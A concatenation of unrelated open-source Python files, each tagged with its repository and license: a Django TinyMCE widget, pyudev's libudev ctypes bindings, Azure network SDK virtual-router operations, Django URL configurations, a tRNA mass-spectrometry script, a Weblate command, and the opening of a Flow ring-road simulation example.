if mce_settings.ADDITIONAL_JS_URLS:
js += mce_settings.ADDITIONAL_JS_URLS
css = {"all": [reverse("tinymce-css")]}
if mce_settings.CSS_URL:
css["all"].append(mce_settings.CSS_URL)
return Media(js=js, css=css)
class AdminTinyMCE(TinyMCE, admin_widgets.AdminTextareaWidget):
"""TinyMCE 4 widget for Django Admin interface"""
pass
__all__ = ["TinyMCE", "render_tinymce_init_js"]
| browniebroke/django-tinymce4-widget | src/tinymce/widgets.py | Python | mit | 5,392 |
from .. utils import TranspileTestCase, BuiltinFunctionTestCase
class AnyTests(TranspileTestCase):
pass
class BuiltinAnyFunctionTests(BuiltinFunctionTestCase, TranspileTestCase):
functions = ["any"]
| cflee/voc | tests/builtins/test_any.py | Python | bsd-3-clause | 211 |
# -*- coding: utf-8 -*-
# Copyright (C) 2010, 2011, 2012 Sebastian Wiesner <[email protected]>
# This library is free software; you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation; either version 2.1 of the License, or (at your
# option) any later version.
# This library is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License
# for more details.
# You should have received a copy of the GNU Lesser General Public License
# along with this library; if not, write to the Free Software Foundation,
# Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
_libudev
========
Wrapper types for libudev. Use ``libudev`` attribute to access libudev
functions.
.. moduleauthor:: Sebastian Wiesner <[email protected]>
"""
from __future__ import (print_function, division, unicode_literals,
absolute_import)
import os
import errno
from ctypes import (CDLL, Structure, POINTER, get_errno,
c_char, c_char_p, c_int, c_ulonglong)
from ctypes.util import find_library
class udev(Structure):
"""
Dummy for ``udev`` structure.
"""
pass
udev_p = POINTER(udev)
class udev_enumerate(Structure):
"""
Dummy for ``udev_enumerate`` structure.
"""
udev_enumerate_p = POINTER(udev_enumerate)
class udev_list_entry(Structure):
"""
Dummy for ``udev_list_entry`` structure.
"""
udev_list_entry_p = POINTER(udev_list_entry)
class udev_device(Structure):
"""
Dummy for ``udev_device`` structure.
"""
udev_device_p = POINTER(udev_device)
class udev_monitor(Structure):
"""
Dummy for ``udev_device`` structure.
"""
udev_monitor_p = POINTER(udev_monitor)
dev_t = c_ulonglong
SIGNATURES = {
# context
'udev': dict(
new=([], udev_p),
unref=([udev_p], None),
ref=([udev_p], udev_p),
get_sys_path=([udev_p], c_char_p),
get_dev_path=([udev_p], c_char_p),
get_run_path=([udev_p], c_char_p),
get_log_priority=([udev_p], c_int),
set_log_priority=([udev_p, c_int], None)),
# enumeration
'udev_enumerate': dict(
new=([udev_p], udev_enumerate_p),
ref=([udev_enumerate_p], udev_enumerate_p),
unref=([udev_enumerate_p], None),
add_match_subsystem=([udev_enumerate_p, c_char_p], c_int),
add_nomatch_subsystem=([udev_enumerate_p, c_char_p], c_int),
add_match_property=([udev_enumerate_p, c_char_p, c_char_p], c_int),
add_match_sysattr=([udev_enumerate_p, c_char_p, c_char_p], c_int),
add_nomatch_sysattr=([udev_enumerate_p, c_char_p, c_char_p], c_int),
add_match_tag=([udev_enumerate_p, c_char_p], c_int),
add_match_sysname=([udev_enumerate_p, c_char_p], c_int),
add_match_parent=([udev_enumerate_p, udev_device_p], c_int),
add_match_is_initialized=([udev_enumerate_p], c_int),
scan_devices=([udev_enumerate_p], c_int),
get_list_entry=([udev_enumerate_p], udev_list_entry_p)),
# list entries
'udev_list_entry': dict(
get_next=([udev_list_entry_p], udev_list_entry_p),
get_name=([udev_list_entry_p], c_char_p),
get_value=([udev_list_entry_p], c_char_p)),
# devices
'udev_device': dict(
ref=([udev_device_p], udev_device_p),
unref=([udev_device_p], None),
new_from_syspath=([udev_p, c_char_p], udev_device_p),
new_from_subsystem_sysname=([udev_p, c_char_p, c_char_p],
udev_device_p),
new_from_devnum=([udev_p, c_char, dev_t], udev_device_p),
new_from_environment=([udev_p], udev_device_p),
get_parent=([udev_device_p], udev_device_p),
get_parent_with_subsystem_devtype=([udev_device_p, c_char_p, c_char_p],
udev_device_p),
get_devpath=([udev_device_p], c_char_p),
get_subsystem=([udev_device_p], c_char_p),
get_syspath=([udev_device_p], c_char_p),
get_sysnum=([udev_device_p], c_char_p),
get_sysname=([udev_device_p], c_char_p),
get_driver=([udev_device_p], c_char_p),
get_devtype=([udev_device_p], c_char_p),
get_devnode=([udev_device_p], c_char_p),
get_property_value=([udev_device_p, c_char_p], c_char_p),
get_sysattr_value=([udev_device_p, c_char_p], c_char_p),
get_devnum=([udev_device_p], dev_t),
get_action=([udev_device_p], c_char_p),
get_seqnum=([udev_device_p], c_ulonglong),
get_is_initialized=([udev_device_p], c_int),
get_usec_since_initialized=([udev_device_p], c_ulonglong),
get_devlinks_list_entry=([udev_device_p], udev_list_entry_p),
get_tags_list_entry=([udev_device_p], udev_list_entry_p),
get_properties_list_entry=([udev_device_p], udev_list_entry_p),
get_sysattr_list_entry=([udev_device_p], udev_list_entry_p),
has_tag=([udev_device_p, c_char_p], c_int)),
# monitoring
'udev_monitor': dict(
ref=([udev_monitor_p], udev_monitor_p),
unref=([udev_monitor_p], None),
new_from_netlink=([udev_p, c_char_p], udev_monitor_p),
enable_receiving=([udev_monitor_p], c_int),
set_receive_buffer_size=([udev_monitor_p, c_int], c_int),
get_fd=([udev_monitor_p], c_int),
receive_device=([udev_monitor_p], udev_device_p),
filter_add_match_subsystem_devtype=(
[udev_monitor_p, c_char_p, c_char_p], c_int),
filter_add_match_tag=([udev_monitor_p, c_char_p], c_int),
filter_update=([udev_monitor_p], c_int),
filter_remove=([udev_monitor_p], c_int))
}
ERRNO_EXCEPTIONS = {
errno.ENOMEM: MemoryError,
errno.EOVERFLOW: OverflowError,
errno.EINVAL: ValueError
}
def exception_from_errno(errno):
"""
Create an exception from ``errno``.
``errno`` is an integral error number.
Return an exception object appropriate to ``errno``.
"""
exception = ERRNO_EXCEPTIONS.get(errno)
if exception is not None:
return exception()
else:
return EnvironmentError(errno, os.strerror(errno))
def check_negative_errorcode(result, func, *args):
"""
Error checker for udev funtions, which return negative error codes.
If ``result`` is smaller than ``0``, it is interpreted as negative error
code, and an appropriate exception is raised:
- ``-ENOMEM`` raises a :exc:`~exceptions.MemoryError`
- ``-EOVERFLOW`` raises a :exc:`~exceptions.OverflowError`
- all other error codes raise :exc:`~exceptions.EnvironmentError`
If result is greater or equal to ``0``, it is returned unchanged.
"""
if result < 0:
# udev returns the *negative* errno code at this point
errno = -result
raise exception_from_errno(errno)
else:
return result
def check_errno(result, func, *args):
"""
Error checker to check the system ``errno`` as returned by
:func:`ctypes.get_errno()`.
If ``result`` is not ``0``, an exception according to this errno is raised.
Otherwise nothing happens.
"""
if result != 0:
errno = get_errno()
if errno != 0:
raise exception_from_errno(errno)
return result
def check_errno_on_null_pointer(result, func, *args):
"""
Error checker to check the system ``errno`` as returned by
:func:`ctypes.get_errno()`.
If ``result`` is a null pointer, an exception according to this errno is
raised. Otherwise nothing happens.
"""
if not result:
errno = get_errno()
if errno != 0:
raise exception_from_errno(errno)
return result
ERROR_CHECKERS = dict(
udev_enumerate_add_match_parent=check_negative_errorcode,
udev_enumerate_add_match_subsystem=check_negative_errorcode,
udev_enumerate_add_nomatch_subsystem=check_negative_errorcode,
udev_enumerate_add_match_property=check_negative_errorcode,
udev_enumerate_add_match_sysattr=check_negative_errorcode,
udev_enumerate_add_nomatch_sysattr=check_negative_errorcode,
udev_enumerate_add_match_tag=check_negative_errorcode,
udev_enumerate_add_match_sysname=check_negative_errorcode,
udev_enumerate_add_match_is_initialized=check_negative_errorcode,
udev_monitor_set_receive_buffer_size=check_errno,
# libudev doc says, enable_receiving returns a negative errno, but tests
# show that this is not reliable, so query the real error code
udev_monitor_enable_receiving=check_errno,
udev_monitor_receive_device=check_errno_on_null_pointer,
udev_monitor_filter_add_match_subsystem_devtype=check_negative_errorcode,
udev_monitor_filter_add_match_tag=check_negative_errorcode,
udev_monitor_filter_update=check_errno,
udev_monitor_filter_remove=check_errno,
)
def load_udev_library():
"""
Load the ``udev`` library and return a :class:`ctypes.CDLL` object for
it. The library has errno handling enabled.
Important functions are given proper signatures and return types to
support type checking and argument conversion.
Raise :exc:`~exceptions.ImportError`, if the udev library was not found.
"""
if 'PYUDEV_UDEV_LIBRARY_NAME' in os.environ:
udev_library_name = os.environ['PYUDEV_UDEV_LIBRARY_NAME']
else:
udev_library_name = find_library('udev')
if not udev_library_name:
raise ImportError('No library named udev, consider setting PYUDEV_UDEV_LIBRARY_NAME')
libudev = CDLL(udev_library_name, use_errno=True)
# context function signature
for namespace, members in SIGNATURES.items():
for funcname in members:
fullname = '{0}_{1}'.format(namespace, funcname)
func = getattr(libudev, fullname, None)
if func:
argtypes, restype = members[funcname]
func.argtypes = argtypes
func.restype = restype
errorchecker = ERROR_CHECKERS.get(fullname)
if errorchecker:
func.errcheck = errorchecker
return libudev
libudev = load_udev_library()
| Stratoscale/inaugurator | inaugurator/pyudev/_libudev.py | Python | apache-2.0 | 10,338 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class VirtualRoutersOperations:
"""VirtualRoutersOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_12_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _delete_initial(
self,
resource_group_name: str,
virtual_router_name: str,
**kwargs: Any
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-12-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
virtual_router_name: str,
**kwargs: Any
) -> AsyncLROPoller[None]:
"""Deletes the specified Virtual Router.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_router_name: The name of the Virtual Router.
:type virtual_router_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
virtual_router_name=virtual_router_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}'} # type: ignore
async def get(
self,
resource_group_name: str,
virtual_router_name: str,
expand: Optional[str] = None,
**kwargs: Any
) -> "_models.VirtualRouter":
"""Gets the specified Virtual Router.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_router_name: The name of the Virtual Router.
:type virtual_router_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: VirtualRouter, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_12_01.models.VirtualRouter
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouter"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-12-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('VirtualRouter', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
virtual_router_name: str,
parameters: "_models.VirtualRouter",
**kwargs: Any
) -> "_models.VirtualRouter":
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouter"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-12-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'VirtualRouter')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('VirtualRouter', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('VirtualRouter', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
virtual_router_name: str,
parameters: "_models.VirtualRouter",
**kwargs: Any
) -> AsyncLROPoller["_models.VirtualRouter"]:
"""Creates or updates the specified Virtual Router.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_router_name: The name of the Virtual Router.
:type virtual_router_name: str
:param parameters: Parameters supplied to the create or update Virtual Router.
:type parameters: ~azure.mgmt.network.v2019_12_01.models.VirtualRouter
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either VirtualRouter or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2019_12_01.models.VirtualRouter]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouter"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
virtual_router_name=virtual_router_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('VirtualRouter', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}'} # type: ignore
def list_by_resource_group(
self,
resource_group_name: str,
**kwargs: Any
) -> AsyncIterable["_models.VirtualRouterListResult"]:
"""Lists all Virtual Routers in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either VirtualRouterListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_12_01.models.VirtualRouterListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouterListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-12-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('VirtualRouterListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters'} # type: ignore
def list(
self,
**kwargs: Any
) -> AsyncIterable["_models.VirtualRouterListResult"]:
"""Gets all the Virtual Routers in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either VirtualRouterListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2019_12_01.models.VirtualRouterListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouterListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-12-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('VirtualRouterListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/virtualRouters'} # type: ignore
| Azure/azure-sdk-for-python | sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_12_01/aio/operations/_virtual_routers_operations.py | Python | mit | 24,260 |
from .parameter import parameter
from .attribute import attribute
from .wasp import wasp
| agoose77/hivesystem | hiveguilib/spyderbees/__init__.py | Python | bsd-2-clause | 89 |
from django.conf.urls import url
from django.contrib.auth.views import password_change
from . import views
urlpatterns = [
url(r'^$', views.UserList.as_view(), name='user_list'),
url(r'^edit/$', views.UserUpdate.as_view(), name='user_profile_edit'),
url(r'^change-password/$', password_change, name='user_change_password', kwargs={
'template_name': 'users/password_change_form.html',
'post_change_redirect': '/users/edit/',
}),
url(r'^membership/$', views.MembershipCreate.as_view(), name='user_membership_create'),
url(r'^membership/edit/$', views.MembershipUpdate.as_view(), name='user_membership_edit'),
url(r'^membership/thanks/$', views.MembershipThanks.as_view(), name='user_membership_thanks'),
url(r'^membership/affirm/$', views.MembershipVoteAffirm.as_view(), name='membership_affirm_vote'),
url(r'^membership/affirm/done/$', views.MembershipVoteAffirmDone.as_view(), name='membership_affirm_vote_done'),
url(r'^(?P<slug>[-_\w\@\.+]+)/$', views.UserDetail.as_view(), name='user_detail'),
]
| lebronhkh/pythondotorg | users/urls.py | Python | apache-2.0 | 1,059 |
'''
Integrate tRNA unique mass and find corresponding peaks
'''
from RNAMassGen import GetUniqueMass
from GetPeaks import GetPeaksWithRTEstimate
def main():
ms_file = "./E165ug.mzML"
mass_dict = GetUniqueMass("./Data/tRNAseq.txt")
print mass_dict
mass_list = []
mass_all_possible = dict()
for rna in mass_dict:
mass_all_possible[rna] = dict()
for seg_mass in mass_dict[rna]:
all_mass = AllMassPossibility(seg_mass[1])
mass_all_possible[rna][seg_mass[0]] = all_mass
mass_list += all_mass
print mass_all_possible
max_int_dict = GetPeaksWithRTEstimate(ms_file, mass_list)
print max_int_dict
for header in mass_all_possible:
print header
for seg in mass_all_possible[header]:
print seg
for mass in mass_all_possible[header][seg]:
print mass
print "max intensity:", max_int_dict[mass]
if __name__ == "__main__":
main()
| ajing/MassSpec | Integrate.py | Python | mit | 992 |
from django.conf import settings
from django.conf.urls import patterns, include, url
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url(r'^admin/', include(admin.site.urls)),
(r'^accounts/', include('allauth.urls')),
(r'^accounts/', include('allauth.urls')),
(r'^', include('surveys.urls')),
)
if settings.DEBUG:
import debug_toolbar
urlpatterns += patterns('',
url(r'^__debug__/', include(debug_toolbar.urls)),
)
| mainecivichackday/RISE_Survey | rise/urls.py | Python | bsd-3-clause | 487 |
# -*- coding: utf-8 -*-
#
# Copyright © 2012 - 2015 Michal Čihař <[email protected]>
#
# This file is part of Weblate <http://weblate.org/>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from weblate.trans.management.commands import WeblateCommand
class Command(WeblateCommand):
help = 'unlocks subproject for editing'
def handle(self, *args, **options):
for subproject in self.get_subprojects(*args, **options):
if subproject.locked:
subproject.locked = False
subproject.save()
| mablae/weblate | weblate/trans/management/commands/unlock_translation.py | Python | gpl-3.0 | 1,136 |
"""Used as an example of sugiyama experiment.
This example consists of 22 IDM cars on a ring creating shockwaves.
"""
from flow.controllers import IDMController, ContinuousRouter
from flow.core.experiment import Experiment
from flow.core.params import SumoParams, EnvParams, \
InitialConfig, NetParams, SumoCarFollowingParams
from flow.core.params import VehicleParams
from flow.envs.loop.loop_accel import AccelEnv, ADDITIONAL_ENV_PARAMS
from flow.scenarios.loop import LoopScenario, ADDITIONAL_NET_PARAMS
def sugiyama_example(render=None):
"""
Perform a simulation of vehicles on a ring road.
Parameters
----------
render : bool, optional
specifies whether to use the gui during execution
Returns
-------
exp: flow.core.experiment.Experiment
A non-rl experiment demonstrating the performance of human-driven
vehicles on a ring road.
"""
sim_params = SumoParams(sim_step=0.1, render=True)
if render is not None:
sim_params.render = render
vehicles = VehicleParams()
vehicles.add(
veh_id="idm",
acceleration_controller=(IDMController, {}),
car_following_params=SumoCarFollowingParams(
min_gap=0
),
routing_controller=(ContinuousRouter, {}),
